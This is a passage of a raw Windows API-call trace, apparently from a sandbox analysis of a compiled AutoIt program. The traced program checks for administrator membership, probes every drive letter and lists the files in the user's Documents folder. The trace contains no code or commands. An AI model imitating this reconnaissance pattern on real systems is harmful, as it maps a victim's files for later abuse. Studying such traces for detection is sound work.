lpsz="_WINAPI_MULTIBYTETOWIDECHAREX") returned 0x1d [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_OEMTOCHAR", cchLength=0x11 | out: lpsz="_WINAPI_OEMTOCHAR") returned 0x11 [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_POINTFROMRECT", cchLength=0x15 | out: lpsz="_WINAPI_POINTFROMRECT") returned 0x15 [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_PRIMARYLANGID", cchLength=0x15 | out: lpsz="_WINAPI_PRIMARYLANGID") returned 0x15 [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_SCREENTOCLIENT", cchLength=0x16 | out: lpsz="_WINAPI_SCREENTOCLIENT") returned 0x16 [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_SHORTTOWORD", cchLength=0x13 | out: lpsz="_WINAPI_SHORTTOWORD") returned 0x13 [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_STRFORMATBYTESIZE", cchLength=0x19 | out: lpsz="_WINAPI_STRFORMATBYTESIZE") returned 0x19 [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_STRFORMATBYTESIZEEX", cchLength=0x1b | out: lpsz="_WINAPI_STRFORMATBYTESIZEEX") returned 0x1b [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_STRFORMATKBSIZE", cchLength=0x17 | out: lpsz="_WINAPI_STRFORMATKBSIZE") returned 0x17 [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_STRFROMTIMEINTERVAL", cchLength=0x1b | out: lpsz="_WINAPI_STRFROMTIMEINTERVAL") returned 0x1b [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_STRINGFROMGUID", cchLength=0x16 | out: lpsz="_WINAPI_STRINGFROMGUID") returned 0x16 [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_SUBLANGID", cchLength=0x11 | out: lpsz="_WINAPI_SUBLANGID") returned 0x11 [0073.223] CharUpperBuffW (in: lpsz="_WINAPI_SWAPDWORD", cchLength=0x11 | out: lpsz="_WINAPI_SWAPDWORD") returned 0x11 [0073.228] CharUpperBuffW (in: lpsz="_WINAPI_SWAPQWORD", cchLength=0x11 | out: lpsz="_WINAPI_SWAPQWORD") returned 0x11 [0073.228] CharUpperBuffW (in: lpsz="_WINAPI_SWAPWORD", cchLength=0x10 | out: lpsz="_WINAPI_SWAPWORD") returned 0x10 [0073.228] CharUpperBuffW (in: lpsz="_WINAPI_WIDECHARTOMULTIBYTE", cchLength=0x1b | out: lpsz="_WINAPI_WIDECHARTOMULTIBYTE") returned 0x1b [0073.228] CharUpperBuffW (in: lpsz="_WINAPI_WORDTOSHORT", cchLength=0x13 | out: lpsz="_WINAPI_WORDTOSHORT") returned 0x13 [0073.260] CharUpperBuffW (in: lpsz="_WINAPI_CREATEBUFFER", cchLength=0x14 | out: lpsz="_WINAPI_CREATEBUFFER") returned 0x14 [0073.260] CharUpperBuffW (in: lpsz="_WINAPI_CREATEBUFFERFROMSTRUCT", cchLength=0x1e | out: lpsz="_WINAPI_CREATEBUFFERFROMSTRUCT") returned 0x1e [0073.260] CharUpperBuffW (in: lpsz="_WINAPI_CREATESTRING", cchLength=0x14 | out: lpsz="_WINAPI_CREATESTRING") returned 0x14 [0073.260] CharUpperBuffW (in: lpsz="_WINAPI_EQUALMEMORY", cchLength=0x13 | out: lpsz="_WINAPI_EQUALMEMORY") returned 0x13 [0073.260] CharUpperBuffW (in: lpsz="_WINAPI_FILLMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_FILLMEMORY") returned 0x12 [0073.260] CharUpperBuffW (in: lpsz="_WINAPI_FREEMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_FREEMEMORY") returned 0x12 [0073.260] CharUpperBuffW (in: lpsz="_WINAPI_GETMEMORYSIZE", cchLength=0x15 | out: lpsz="_WINAPI_GETMEMORYSIZE") returned 0x15 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_GLOBALMEMORYSTATUS", cchLength=0x1a | out: lpsz="_WINAPI_GLOBALMEMORYSTATUS") returned 0x1a [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_ISBADCODEPTR", cchLength=0x14 | out: lpsz="_WINAPI_ISBADCODEPTR") returned 0x14 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_ISBADREADPTR", cchLength=0x14 | out: lpsz="_WINAPI_ISBADREADPTR") returned 0x14 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_ISBADSTRINGPTR", cchLength=0x16 | out: lpsz="_WINAPI_ISBADSTRINGPTR") returned 0x16 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_ISBADWRITEPTR", cchLength=0x15 | out: lpsz="_WINAPI_ISBADWRITEPTR") returned 0x15 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_ISMEMORY", cchLength=0x10 | out: lpsz="_WINAPI_ISMEMORY") returned 0x10 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_LOCALFREE", cchLength=0x11 | out: lpsz="_WINAPI_LOCALFREE") returned 0x11 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_MOVEMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_MOVEMEMORY") returned 0x12 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_READPROCESSMEMORY", cchLength=0x19 | out: lpsz="_WINAPI_READPROCESSMEMORY") returned 0x19 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_WRITEPROCESSMEMORY", cchLength=0x1a | out: lpsz="_WINAPI_WRITEPROCESSMEMORY") returned 0x1a [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_ZEROMEMORY", cchLength=0x12 | out: lpsz="_WINAPI_ZEROMEMORY") returned 0x12 [0073.261] CharUpperBuffW (in: lpsz="__HEAPALLOC", cchLength=0xb | out: lpsz="__HEAPALLOC") returned 0xb [0073.261] CharUpperBuffW (in: lpsz="__HEAPFREE", cchLength=0xa | out: lpsz="__HEAPFREE") returned 0xa [0073.261] CharUpperBuffW (in: lpsz="__HEAPREALLOC", cchLength=0xd | out: lpsz="__HEAPREALLOC") returned 0xd [0073.261] CharUpperBuffW (in: lpsz="__HEAPSIZE", cchLength=0xa | out: lpsz="__HEAPSIZE") returned 0xa [0073.261] CharUpperBuffW (in: lpsz="__HEAPVALIDATE", cchLength=0xe | out: lpsz="__HEAPVALIDATE") returned 0xe [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_ARRAYTOSTRUCT", cchLength=0x15 | out: lpsz="_WINAPI_ARRAYTOSTRUCT") returned 0x15 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_CREATEMARGINS", cchLength=0x15 | out: lpsz="_WINAPI_CREATEMARGINS") returned 0x15 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_CREATEPOINT", cchLength=0x13 | out: lpsz="_WINAPI_CREATEPOINT") returned 0x13 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_CREATERECT", cchLength=0x12 | out: lpsz="_WINAPI_CREATERECT") returned 0x12 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_CREATERECTEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATERECTEX") returned 0x14 [0073.261] CharUpperBuffW (in: lpsz="_WINAPI_CREATESIZE", cchLength=0x12 | out: lpsz="_WINAPI_CREATESIZE") returned 0x12 [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_COPYSTRUCT", cchLength=0x12 | out: lpsz="_WINAPI_COPYSTRUCT") returned 0x12 [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_GETEXTENDED", cchLength=0x13 | out: lpsz="_WINAPI_GETEXTENDED") returned 0x13 [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_GETMOUSEPOS", cchLength=0x13 | out: lpsz="_WINAPI_GETMOUSEPOS") returned 0x13 [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_GETMOUSEPOSX", cchLength=0x14 | out: lpsz="_WINAPI_GETMOUSEPOSX") returned 0x14 [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_GETMOUSEPOSY", cchLength=0x14 | out: lpsz="_WINAPI_GETMOUSEPOSY") returned 0x14 [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_MULDIV", cchLength=0xe | out: lpsz="_WINAPI_MULDIV") returned 0xe [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_PLAYSOUND", cchLength=0x11 | out: lpsz="_WINAPI_PLAYSOUND") returned 0x11 [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_STRINGLENA", cchLength=0x12 | out: lpsz="_WINAPI_STRINGLENA") returned 0x12 [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_STRINGLENW", cchLength=0x12 | out: lpsz="_WINAPI_STRINGLENW") returned 0x12 [0073.262] CharUpperBuffW (in: lpsz="_WINAPI_STRUCTTOARRAY", cchLength=0x15 | out: lpsz="_WINAPI_STRUCTTOARRAY") returned 0x15 [0073.263] CharUpperBuffW (in: lpsz="_WINAPI_UNIONSTRUCT", cchLength=0x13 | out: lpsz="_WINAPI_UNIONSTRUCT") returned 0x13 [0073.263] CharUpperBuffW (in: lpsz="_WINAPI_COMMANDLINETOARGV", cchLength=0x19 | out: lpsz="_WINAPI_COMMANDLINETOARGV") returned 0x19 [0073.263] CharUpperBuffW (in: lpsz="_WINAPI_ISNAMEINEXPRESSION", cchLength=0x1a | out: lpsz="_WINAPI_ISNAMEINEXPRESSION") returned 0x1a [0073.263] CharUpperBuffW (in: lpsz="_WINAPI_PARSEURL", cchLength=0x10 | out: lpsz="_WINAPI_PARSEURL") returned 0x10 [0073.263] CharUpperBuffW (in: lpsz="_WINAPI_PARSEUSERNAME", cchLength=0x15 | out: lpsz="_WINAPI_PARSEUSERNAME") returned 0x15 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHADDBACKSLASH", cchLength=0x18 | out: lpsz="_WINAPI_PATHADDBACKSLASH") returned 0x18 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHADDEXTENSION", cchLength=0x18 | out: lpsz="_WINAPI_PATHADDEXTENSION") returned 0x18 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHAPPEND", cchLength=0x12 | out: lpsz="_WINAPI_PATHAPPEND") returned 0x12 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHBUILDROOT", cchLength=0x15 | out: lpsz="_WINAPI_PATHBUILDROOT") returned 0x15 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHCANONICALIZE", cchLength=0x18 | out: lpsz="_WINAPI_PATHCANONICALIZE") returned 0x18 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHCOMMONPREFIX", cchLength=0x18 | out: lpsz="_WINAPI_PATHCOMMONPREFIX") returned 0x18 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHCOMPACTPATH", cchLength=0x17 | out: lpsz="_WINAPI_PATHCOMPACTPATH") returned 0x17 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHCOMPACTPATHEX", cchLength=0x19 | out: lpsz="_WINAPI_PATHCOMPACTPATHEX") returned 0x19 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHCREATEFROMURL", cchLength=0x19 | out: lpsz="_WINAPI_PATHCREATEFROMURL") returned 0x19 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDEXTENSION", cchLength=0x19 | out: lpsz="_WINAPI_PATHFINDEXTENSION") returned 0x19 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDFILENAME", cchLength=0x18 | out: lpsz="_WINAPI_PATHFINDFILENAME") returned 0x18 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDNEXTCOMPONENT", cchLength=0x1d | out: lpsz="_WINAPI_PATHFINDNEXTCOMPONENT") returned 0x1d [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDONPATH", cchLength=0x16 | out: lpsz="_WINAPI_PATHFINDONPATH") returned 0x16 [0073.264] CharUpperBuffW (in: lpsz="_WINAPI_PATHGETARGS", cchLength=0x13 | out: lpsz="_WINAPI_PATHGETARGS") returned 0x13 [0073.265] CharUpperBuffW (in: lpsz="_WINAPI_PATHGETCHARTYPE", cchLength=0x17 | out: lpsz="_WINAPI_PATHGETCHARTYPE") returned 0x17 [0073.265] CharUpperBuffW (in: lpsz="_WINAPI_PATHGETDRIVENUMBER", cchLength=0x1a | out: lpsz="_WINAPI_PATHGETDRIVENUMBER") returned 0x1a [0073.265] CharUpperBuffW (in: lpsz="_WINAPI_PATHISCONTENTTYPE", cchLength=0x19 | out: lpsz="_WINAPI_PATHISCONTENTTYPE") returned 0x19 [0073.266] CharUpperBuffW (in: lpsz="_WINAPI_PATHISEXE", cchLength=0x11 | out: lpsz="_WINAPI_PATHISEXE") returned 0x11 [0073.266] CharUpperBuffW (in: lpsz="_WINAPI_PATHISFILESPEC", cchLength=0x16 | out: lpsz="_WINAPI_PATHISFILESPEC") returned 0x16 [0073.266] CharUpperBuffW (in: lpsz="_WINAPI_PATHISLFNFILESPEC", cchLength=0x19 | out: lpsz="_WINAPI_PATHISLFNFILESPEC") returned 0x19 [0073.266] CharUpperBuffW (in: lpsz="_WINAPI_PATHISRELATIVE", cchLength=0x16 | out: lpsz="_WINAPI_PATHISRELATIVE") returned 0x16 [0073.266] CharUpperBuffW (in: lpsz="_WINAPI_PATHISROOT", cchLength=0x12 | out: lpsz="_WINAPI_PATHISROOT") returned 0x12 [0073.266] CharUpperBuffW (in: lpsz="_WINAPI_PATHISSAMEROOT", cchLength=0x16 | out: lpsz="_WINAPI_PATHISSAMEROOT") returned 0x16 [0073.267] CharUpperBuffW (in: lpsz="_WINAPI_PATHISSYSTEMFOLDER", cchLength=0x1a | out: lpsz="_WINAPI_PATHISSYSTEMFOLDER") returned 0x1a [0073.796] AllocateAndInitializeSid (in: pIdentifierAuthority=0x144f760, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x144f768 | out: pSid=0x144f768*=0x43c9ae8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0073.796] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x43c9ae8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x144f76c | out: IsMember=0x144f76c) returned 1 [0073.797] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.797] CharLowerBuffW (in: lpsz="ALL", cchLength=0x3 | out: lpsz="all") returned 0x3 [0073.797] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0073.797] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0073.797] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0073.797] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0073.798] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0073.798] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0073.798] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0073.798] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0073.798] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0073.798] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0073.798] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0073.799] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0073.799] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0073.799] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0073.799] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0073.799] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0073.800] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0073.800] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0073.800] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0073.800] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0073.800] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0073.800] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0073.800] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0073.801] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0073.801] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0073.801] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0073.801] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.801] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.801] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.801] SetErrorMode (uMode=0x1) returned 0x0 [0073.801] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0073.801] SetErrorMode (uMode=0x0) returned 0x1 [0073.801] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fixed", cchCount1=5, lpString2="CDROM", cchCount2=5) returned 3 [0073.801] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x144f448, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0073.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c:", cchCount1=2, lpString2="C:", cchCount2=2) returned 2 [0073.802] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.802] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.802] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.802] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.802] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x144f1d8 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0073.807] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0073.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.808] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0073.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.808] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe82c5473, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe82c5473, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9d10, cFileName=".", cAlternateFileName="")) returned 0x41ac240 [0073.809] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe82c5473, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe82c5473, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9d10, cFileName="..", cAlternateFileName="")) returned 1 [0073.809] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb1e850, ftCreationTime.dwHighDateTime=0x1d58c67, ftLastAccessTime.dwLowDateTime=0x8f874ac0, ftLastAccessTime.dwHighDateTime=0x1d5bf8d, ftLastWriteTime.dwLowDateTime=0x8f874ac0, ftLastWriteTime.dwHighDateTime=0x1d5bf8d, nFileSizeHigh=0x0, nFileSizeLow=0x5a50, dwReserved0=0x0, dwReserved1=0x43c9d10, cFileName="16hIz1 tYfBoIcwVhJi.docx", cAlternateFileName="16HIZ1~1.DOC")) returned 1 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9f0 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22d0 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f90 | out: hHeap=0x1780000) returned 1 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.809] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0073.809] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0073.810] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0073.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0073.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0073.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0073.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0073.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.810] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0073.810] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.810] RtlAllocateHeap (HeapHandle=0x1780000, 